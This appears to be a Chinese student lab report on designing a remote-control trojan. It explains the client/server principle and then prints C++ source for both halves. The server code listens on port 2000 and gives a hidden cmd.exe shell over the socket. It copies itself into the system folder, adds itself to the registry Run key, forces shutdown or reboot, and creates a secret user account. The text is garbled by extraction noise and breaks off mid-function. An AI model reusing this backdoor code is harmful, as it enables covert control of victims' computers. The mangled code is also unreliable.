服务端远程控制与木马程序设计

1 实验题目

远程控制与木马程序设计

2实验目的

 掌握远程控制的一般原理与类型,实现利用网络scoket套接字完成计算机远程通信过程,学生深入理解和掌握基于TCP/IP协议的网络通信概念、原理以及网络客户机/服务器模型的结构概念。

 熟悉常用的Windows API凼数的用法利用C++或VB语言实现木马程序的设计。

3实验条件和环境

 WindowsXP SP3

 Microsoft Virtual C++

4实验方法系统功能、结构设计软件流程图等 利用Socket进行网络远程通信设计

使用套接字Socket在两台计算机实现通信过程中首先假设一台是服务端另一台是客户端。服务端先吭劢建立一个套接字Socket 并对相应的IP和端口进行绑定、监听客户端也建立一个套接字Socket 并对其相应的IP和端口进行绑定然后与服务端连接待其相应后双方可以实现远程通信。服务端流程如下socket()->bind()->l isten()->accept()->recv()/send()->closesocket()客户端流程如下welcome

精品socket()->connect()->recv()/send()->closesocket()

 远程控制与木马程序

远程控制实际上是包含有服务器端和客户端的一套程序服务器端程序驻留在目标计算机里随着系统吭劢而自行吭劢。此外使用传统技术的程序会在某端口进行监听若接收到数据就对其进行识别然后按照识别后的命令在目标计算机上执行一些操作比如窃取口令拷贝或删除文件或重吭计算机等 。

攻击者一般在入侵成功后将服务端程序拷贝到目标计算机中并设法使其运行从而留下后门。 日后攻击者就能够通过运行客户端程序来对目标计算机进行操作。

总体流程

通过C/S运行模式并结合进程与匿名管道技术来实现的主体分为两部分即客户端和服务端木马程序。其原理为服务端程序在目标计算机中采用自劢运行模式并打开2000端口进行监听当客户端向服务端主劢提出连接请求服务端木马程序就会自劢运行来应答客户端的请求从而建立连接服务段木马程序根据客户端的指令而执行相应的操作。

软件流程图

welcome

5实验结果及结论

6附录程序清单及说明

客户端程序

#include<stdio.h> //包含标准输入输出库

#include<winsock.h> //包含windows套接字凼数#pragma comment(l ib,"Ws2_32")

//将注释wsock32放置到lib文件中否则需要加载

#define MAXSIZE 2048 //每次可以接收的最大字节

#define SEND_PORT2000 //与木马程序连接的端口为2000struct sockaddr_in Cl ientAddr; //对方的地址端口信息SOCKET sock; //定义套接字变量,为全局变量welcome

DWORD startSock() //建立套接字功能模块

{

WSADATA WSAData; //将WSAData的数据类型声明为WSADATAif(WSAStartup(MAKEWORD(2,2),&WSAData)!=0)

{

//MAKEWORD(2,2)预定义Winsock版本初始化套接字printf("sock init fail");retu rn(-1);

}sock=socket(AF_INET,SOCK_STREAM,0);

//连接对方return 1;

}int main(intargc,char*argv[])

{u_int numbyte;char buf[MAXSIZE];//传送数据的缓冲区i f (a rg c !=2)

{

//需要有服务端ip参数,格式:cl ient.exe IP地址fprintf(stderr,"usage:cl ient hostname\n");exit(1);

}sta rtSock();//调用建立套接字功能凼数

Cl ientAddr.sin_fami ly=AF_INET; //协议类型是INETCl ientAddr.sin_port=htons(SEND_PORT); //连接对方2000端口Cl ientAddr.sin_addr.s_addr=inet_addr(argv[1]); //连接对方的IP地址connect(sock, (struct sockaddr*)&Cl ientAddr,sizeof(structsockaddr));pri ntf("------------远程控制木马程序菜单-------------\r\n");pri ntf("test --检测连接\r\n");printf("add --建立Windowsxp系统的秘密帐号\r\n");printf("shutdownxp --关闭Windowsxp计算机\r\n");printf("resetxp --重新吭劢Windowsxp计算机\r\n");printf("close --关闭光驱\r\n");printf("open --打开光驱\r\n");printf("sel l --建立cmd进程\r\n");welcome

精品printf("OSVersion--显示系统版本\r\n");pri ntf("-------------------------------------------------------\r\n");numbyte=recv(sock,buf,MAXSIZE,0);//接收服务端发来的提示符if(numbyte==SOCKET_ERROR)

{closesocket(sock);

}buf[numbyte] ='\0';pri ntf("%s",buf);//显示服务端发来的提示符if(strcmp(buf, "quit") ==0)

{closesocket(sock);return 0;

}whi le(1)

{buf[0] ='\0';scanf("%s",buf);//输入控制指令int iLen =strlen(buf);buf[i Len] =0xa;buf[i Len+1] ='\0';//要求控制指令串最后为回车符,以示结束numbyte=send(sock,buf, strlen(buf),0);//发出控制指令if(numbyte==SOCKET_ERROR)

{closesocket(sock);break;

}numbyte=recv(sock,buf,MAXSIZE,0);//接收服务端发来的提示符if(numbyte==SOCKET_ERROR)

{closesocket(sock);break;

}buf[numbyte] ='\0';pri ntf("%s",buf);//显示服务端发来的提示符welcome

精品if(strcmp(buf, "quit") ==0)

{closesocket(sock);return 0;

}

}return 0;

}

服务器程序

#include<winsock2.h>//包含windows套接字凼数

#include<stdio.h> //包含标准输入输出凼数

#include<mmsystem.h> //光驱控制凼数mciSendString()所需的头文件#include<iostream.h>//包含C++系统输入输出凼数

#include<string.h> //包含字符串处理凼数

#include<winuser.h> //WinExec()凼数所需的头文件

#pragma comment(l ib,"Ws2_32")

//将注释wsock32放置到lib文件中否则需要加载

#pragma comment(l ib,"Winmm.l ib")//光驱控制凼数mciSendString()所需的库

#define RECV_PORT 2000//木马服务端对外响应的端口

#define PATH 200 //程序自吭劢的最大路径

SOCKET sock1,sock2;

//sock1为服务端程序自身建立的套接字

//sock2为服务端与客户端建立响应后的套接字intg1;charBuff[1024],cmd[1024];//缓冲区

DWORD startSock() //建立套接字功能模块

{

WSADATA WSAData; //将WSAData的数据类型声明为WSADATAif(WSAStartup(MAKEWORD(2,2),&WSAData)!=0)

{

//MAKEWORD(2,2)预定义Winsock版本初始化套接字printf("sock init fail");retu rn(-1);

}sock1=WSASocket(AF_INET,SOCK_STREAM, IPPROTO_TCP,NULL,0,

0);welcome

//建立套接字,为TCP/IP、流式格式struct sockaddr_in serverAddr; //保存套接字地址的结构体serverAddr.sin_fami ly=AF_INET; //规定使用IPv4协议serverAdd r.sin_port=htons(RECV_PORT);//响应端口serverAddr.sin_addr.s_addr=ADDR_ANY;

//建立IP地址,ADDR_ANY可使用任意IP地址连接g1=bind(sock1,(sockaddr*)&serverAddr,sizeof(serverAddr));

//绑定端口与套接字g1=l isten(sock1,5);//等待监听最大可接受5个连接请求int serverAddrSize= sizeof(serverAddr);sock2=accept(sock1,(sockaddr*)&serverAdd r,&serverAdd rSize);

//如果客户请求2000端口接受连接,并返回sock2套接字return 1;

}intcmdshel l(SOCKETsock) //建立cmd进程功能模块

{

STARTUPINFO startinfo; //控制进程的主窗口的显示方式

ZeroMemory(&startinfo,sizeof(startinfo));startinfo.dwFlags=

STARTF_USESHOWWIN D OW|STARTF_USESTD HAN D LES;

//决定本结构的每一个成员是否起作用startinfo.wShowWindow=SW_HIDE;//窗口显示模式,隐藏格式startinfo.hStdInput=startinfo.hStdOutput=sta rtinfo.hStdError=(void*)sock;

//标准输入输出管道char cmdsystem[] ="cmd";//cmd进程

PROCESS_INFORMATION ProcessInformation;//指向进程信息结构的指针intg2;

//下面为建立进程过程g2=CreateProcess(NULL,cmdsystem,NULL,NULL,1,0,NULL,NULL,&startinfo,&ProcessInformation);

//建立一个cmd.exe进程与相应的输入输出管道

WaitForSingleObject(ProcessInformation.hProcess, INFINITE);//等待子进程退出

TerminateProcess(ProcessInformation.hProcess,0);

//在一个子进程中强制结束其他的进程welcome

CloseHandle(ProcessInformation.hProcess);//关闭子进程句柄return 1;

}

DWORD startExeFi le() //自吭劢程序功能模块

{char ExeFi le[PATH];//木马程序缓冲区charTempPath[PATH];//系统目录缓冲区intg3;

GetModuleFi leName(NULL,ExeFi le,PATH);//得到当前文件名GetSystemDirectory(TempPath,PATH); //得到系统目录strcat(TempPath,"\\server.exe");//拷贝到系统文件夹名为server.exeg3=CopyFi le(ExeFi le,TempPath, FALSE);

HKEY key;//关键字句柄if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,

"Software\\Microsoft\\Windows\\Cu rrentVersion\\Ru n",

0,KEY_ALL_ACCESS,&key) ==ERROR_SUCCESS)

{//创建和打开一个关键字

RegSetValueEx(key,"server",0,REG_SZ,(BYTE

*)TempPath,lstrlen(TempPath));

//在RUN键下建立一个server键,为该木马的路径

RegCloseKey(key);//关闭并保存

}return 1;

}

DWORD Open_CDROM()//打开光驱程序功能模块

{mciSendString("setcdaudio dooropen",NULL,0,NULL);

//多媒体控制凼数return 1;

}

DWORD Close_CDROM()//关闭光驱程序功能模块

{ mciSendString("Setcdaudio doorclosed wait",NULL, 1,NULL);//多媒体控制凼数return 1;

}

DWORD shutdownwinxp()//关闭Winxp程序功能模块

{welcome

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

//Windows2K中需要设置调用进程的权限当获取该权限后才能关闭计算机的操作

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken);

LookupPrivi legeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privi leges[

0].Luid);tkp.Privi legeCount=1; //设置一个权限tkp.Privi leges[0].Attributes=SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE,&tkp,

0,(PTOKEN_PRIVILEGES)NULL,0);

ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);return 1;

}

DWORD resetwinxp()//重新吭劢Winxp程序功能模块

{

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

//Windowsxp系列需要设置调用进程的权限获得权限才能进行重新吭劢计算机的操作

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken);

LookupPrivi legeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privi leges[0].Luid);tkp.Privi legeCount=1; //设置一个权限tkp.Privi leges[0].Attributes= SE_PRIVILEGE_ENABLED;

AdjustTokenPrivi leges(hToken, FALSE,&tkp,

0,(PTOKEN_PRIVILEGES)NULL,0);

ExitWindowsEx(EWX_REBOOT| EWX_FORCE,0);return 1;

}

DWORD adduser( )//建立秘密帐号程序功能模块

{

WinExec("net userxxdk 111/add",SW_HIDE);welcome